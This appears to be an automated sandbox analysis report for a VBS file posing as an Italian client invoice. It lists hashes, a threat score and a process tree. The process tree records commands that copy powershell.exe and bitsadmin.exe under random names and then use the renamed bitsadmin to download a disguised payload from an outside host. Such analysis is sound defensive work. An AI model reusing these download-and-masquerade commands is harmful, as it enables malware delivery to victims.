Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 07:45
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_STRPRI81C06H264H.vbs
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_STRPRI81C06H264H.vbs
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Fatt_cliente_STRPRI81C06H264H.vbs
-
Size
3KB
-
MD5
f8f845a5680b862bb8cbc3f0963e8a24
-
SHA1
132a39312e13dafab31cca938c64745fd7a82b29
-
SHA256
e9d30232236a8c05a58a9cc13ef79a0d360213ef096f69a3b9f7199e4b458df3
-
SHA512
e5772c837fae26bb4cf2cd8b4c0adae3f652faf74afed8fe7894fffea2eedce0296c147bef58e1a24c3239bf9ed076c4747c1263d4b472172a1469d2c6afe430
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 284 wrote to memory of 304 284 WScript.exe 24 PID 284 wrote to memory of 304 284 WScript.exe 24 PID 284 wrote to memory of 304 284 WScript.exe 24 PID 284 wrote to memory of 1076 284 WScript.exe 26 PID 284 wrote to memory of 1076 284 WScript.exe 26 PID 284 wrote to memory of 1076 284 WScript.exe 26 PID 284 wrote to memory of 1504 284 WScript.exe 28 PID 284 wrote to memory of 1504 284 WScript.exe 28 PID 284 wrote to memory of 1504 284 WScript.exe 28 PID 284 wrote to memory of 1504 284 WScript.exe 28 -
Executes dropped EXE 1 IoCs
pid Process 1504 iXRgjlH.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_STRPRI81C06H264H.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:284 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ziXRgjlH.exe2⤵PID:304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\iXRgjlH.exe2⤵PID:1076
-
-
C:\Users\Admin\AppData\Roaming\iXRgjlH.exe"C:\Users\Admin\AppData\Roaming\iXRgjlH.exe" /transfer pJVFLY /download https://peliculadeestreno.com/libuna/STRPRI81C06H264H/en.jpg C:\Users\Admin\AppData\Roaming\en.jpg2⤵
- Executes dropped EXE
PID:1504
-